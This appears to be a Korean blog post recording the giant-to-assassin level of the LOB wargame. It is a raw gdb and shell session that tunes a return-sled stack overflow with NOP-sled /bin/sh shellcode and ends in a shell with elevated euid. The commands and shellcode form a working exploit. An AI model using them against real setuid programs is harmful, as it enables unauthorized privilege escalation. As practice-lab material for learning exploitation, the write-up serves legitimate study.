Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
기억은 않나지만 ret sleding 으로 풀지않았을까... 생각한다.
0x0 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) x/100x 0xbffffd00
0xbffffd00: 0x69616d6f 0x4f4c006e 0x4d414e47 0x69673d45
0xbffffd10: 0x00746e61 0x4f4d4552 0x4f484554 0x313d5453
0xbffffd20: 0x312e3239 0x322e3836 0x312e3232 0x49414d00
0xbffffd30: 0x762f3d4c 0x732f7261 0x6c6f6f70 0x69616d2f
0xbffffd40: 0x69672f6c 0x00746e61 0x4d524554 0x6574783d
0xbffffd50: 0x48006d72 0x5454534f 0x3d455059 0x36383369
0xbffffd60: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f
0xbffffd70: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273
0xbffffd80: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36
0xbffffd90: 0x682f3a6e 0x2f656d6f 0x6e616967 0x69622f74
0xbffffda0: 0x4f48006e 0x2f3d454d 0x656d6f68 0x6169672f
0xbffffdb0: 0x4900746e 0x5455504e 0x2f3d4352 0x2f637465
0xbffffdc0: 0x75706e69 0x00637274 0x4c454853 0x622f3d4c
0xbffffdd0: 0x622f6e69 0x00687361 0x52455355 0x6169673d
0xbffffde0: 0x4200746e 0x5f485341 0x3d564e45 0x6d6f682f
0xbffffdf0: 0x69672f65 0x2f746e61 0x7361622e 0x00637268
0xbffffe00: 0x474e414c 0x5f6e653d 0x4f005355 0x50595453
0xbffffe10: 0x694c3d45 0x0078756e 0x564c4853 0x00313d4c
0xbffffe20: 0x435f534c 0x524f4c4f 0x6f6e3d53 0x3a30303d
0xbffffe30: 0x303d6966 0x69643a30 0x3b31303d 0x6c3a3433
0xbffffe40: 0x31303d6e 0x3a36333b 0x343d6970 0x33333b30
0xbffffe50: 0x3d6f733a 0x333b3130 0x64623a35 0x3b30343d
0xbffffe60: 0x303b3333 0x64633a31 0x3b30343d 0x303b3333
0xbffffe70: 0x726f3a31 0x3b31303d 0x333b3530 0x31343b37
0xbffffe80: 0x3d696d3a 0x303b3130 0x37333b35 0x3a31343b
(gdb) x/100x 0xbffffd00-100
0xbffffc9c: 0x8969622f 0xb0c189e3 0x5351520b 0x80cde189
0xbffffcac: 0x53454c00 0x45504f53 0x2f7c3d4e 0x2f727375
0xbffffcbc: 0x2f6e6962 0x7373656c 0x65706970 0x2068732e
0xbffffccc: 0x55007325 0x4e524553 0x3d454d41 0x53494800
0xbffffcdc: 0x5a495354 0x30313d45 0x48003030 0x4e54534f
0xbffffcec: 0x3d454d41 0x61636f6c 0x736f686c 0x6f6c2e74
0xbffffcfc: 0x646c6163 0x69616d6f 0x4f4c006e 0x4d414e47
0xbffffd0c: 0x69673d45 0x00746e61 0x4f4d4552 0x4f484554
0xbffffd1c: 0x313d5453 0x312e3239 0x322e3836 0x312e3232
0xbffffd2c: 0x49414d00 0x762f3d4c 0x732f7261 0x6c6f6f70
0xbffffd3c: 0x69616d2f 0x69672f6c 0x00746e61 0x4d524554
0xbffffd4c: 0x6574783d 0x48006d72 0x5454534f 0x3d455059
0xbffffd5c: 0x36383369 0x54415000 0x752f3d48 0x6c2f7273
0xbffffd6c: 0x6c61636f 0x6e69622f 0x69622f3a 0x752f3a6e
0xbffffd7c: 0x622f7273 0x2f3a6e69 0x2f727375 0x52313158
0xbffffd8c: 0x69622f36 0x682f3a6e 0x2f656d6f 0x6e616967
0xbffffd9c: 0x69622f74 0x4f48006e 0x2f3d454d 0x656d6f68
0xbffffdac: 0x6169672f 0x4900746e 0x5455504e 0x2f3d4352
0xbffffdbc: 0x2f637465 0x75706e69 0x00637274 0x4c454853
0xbffffdcc: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355
0xbffffddc: 0x6169673d 0x4200746e 0x5f485341 0x3d564e45
0xbffffdec: 0x6d6f682f 0x69672f65 0x2f746e61 0x7361622e
0xbffffdfc: 0x00637268 0x474e414c 0x5f6e653d 0x4f005355
0xbffffe0c: 0x50595453 0x694c3d45 0x0078756e 0x564c4853
0xbffffe1c: 0x00313d4c 0x435f534c 0x524f4c4f 0x6f6e3d53
(gdb) x/100x 0xbffffd00-300
0xbffffbd4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc04: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc14: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc24: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc34: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc84: 0x90909090 0x90909090 0x90909090 0xc289c031
0xbffffc94: 0x2f6e6850 0x2f686873 0x8969622f 0xb0c189e3
0xbffffca4: 0x5351520b 0x80cde189 0x53454c00 0x45504f53
0xbffffcb4: 0x2f7c3d4e 0x2f727375 0x2f6e6962 0x7373656c
0xbffffcc4: 0x65706970 0x2068732e 0x55007325 0x4e524553
0xbffffcd4: 0x3d454d41 0x53494800 0x5a495354 0x30313d45
0xbffffce4: 0x48003030 0x4e54534f 0x3d454d41 0x61636f6c
0xbffffcf4: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f
0xbffffd04: 0x4f4c006e 0x4d414e47 0x69673d45 0x00746e61
0xbffffd14: 0x4f4d4552 0x4f484554 0x313d5453 0x312e3239
0xbffffd24: 0x322e3836 0x312e3232 0x49414d00 0x762f3d4c
0xbffffd34: 0x732f7261 0x6c6f6f70 0x69616d2f 0x69672f6c
0xbffffd44: 0x00746e61 0x4d524554 0x6574783d 0x48006d72
0xbffffd54: 0x5454534f 0x3d455059 0x36383369 0x54415000
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) q
The program is running. Exit anyway? (y or n) y
[giant@localhost tmp]$
[giant@localhost tmp]$ r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
bash: r: command not found
[giant@localhost tmp]$ bash2
[giant@localhost tmp]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
bash$ id
uid=514(giant) gid=514(giant) groups=514(giant)
bash$ q
sh: q: command not found
bash$ exit
exit
[giant@localhost tmp]$ cd ../
[giant@localhost giant]$ ls
assassin assassin.c tmp
[giant@localhost giant]$ finger
Login Name Tty Idle Login Time Office Office Phone
giant pts/0 Jul 30 18:48 (192.168.222.1)
[giant@localhost giant]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| zombie_assassin -> succubus (0) | 2014.02.20 |
|---|---|
| assassin -> zombie_assassin (0) | 2014.02.20 |
| bugbear -> giant (0) | 2014.02.20 |
| darkknight -> bugbear (0) | 2014.02.20 |
| golem -> darkknight (0) | 2014.02.20 |
